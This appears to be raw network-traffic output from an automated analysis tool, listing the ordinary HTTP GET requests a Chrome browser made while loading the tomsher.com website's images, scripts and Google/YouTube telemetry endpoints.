Source: global trafficHTTP traffic detected: GET /assets/images/menu/payment-check.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/adwords.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/custom_ecommerce.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=ylu3SfIdsVLC_CHJuNK6_egYjIZZxUDFJ_cj1fT_2BK-RHIkQMCDF3SxlhTWanGSvI-ortHlt71N1ulTaErrJpJMlpAvjXGGiOjIWOV5dBabNo6yHeraOvwQrYHrXF9zX11rdAVXQUu84TjdSC40o0yHl5-pR7W7r68n0V8OnPW4GDi2GjED2FnwMP0
Source: global trafficHTTP traffic detected: GET /assets/imgs/logo.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/adobe.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/opencart.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/js/jquery-3.6.0.min.js HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/multimedia.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/api.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/wordpress.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/web_portal.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/header/srv.webp HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu2.webp HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/g-d-ad.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/web-application.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/procurement.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu3.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/Omnichannel.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/meta.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu4.webp HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=ylu3SfIdsVLC_CHJuNK6_egYjIZZxUDFJ_cj1fT_2BK-RHIkQMCDF3SxlhTWanGSvI-ortHlt71N1ulTaErrJpJMlpAvjXGGiOjIWOV5dBabNo6yHeraOvwQrYHrXF9zX11rdAVXQUu84TjdSC40o0yHl5-pR7W7r68n0V8OnPW4GDi2GjED2FnwMP0
Source: global trafficHTTP traffic detected: GET /assets/images/menu/custom-web.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/students.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/icon/menu-black.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/career.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/shared-hosting.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/squarespace.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/fresha.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/vps.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/tomsher.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/world-wide-web.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/captcha.jpg HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/sms.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/contact_us.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/brochure.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/school.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=ylu3SfIdsVLC_CHJuNK6_egYjIZZxUDFJ_cj1fT_2BK-RHIkQMCDF3SxlhTWanGSvI-ortHlt71N1ulTaErrJpJMlpAvjXGGiOjIWOV5dBabNo6yHeraOvwQrYHrXF9zX11rdAVXQUu84TjdSC40o0yHl5-pR7W7r68n0V8OnPW4GDi2GjED2FnwMP0
Source: global trafficHTTP traffic detected: GET /youtubei/v1/log_event?alt=json&key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8 HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/business-partner.webp HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/employee.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/e_brochure.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/ecwid.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/payment-check.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/cdn.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/googlebusiness.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/adwords.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/api.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/email.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
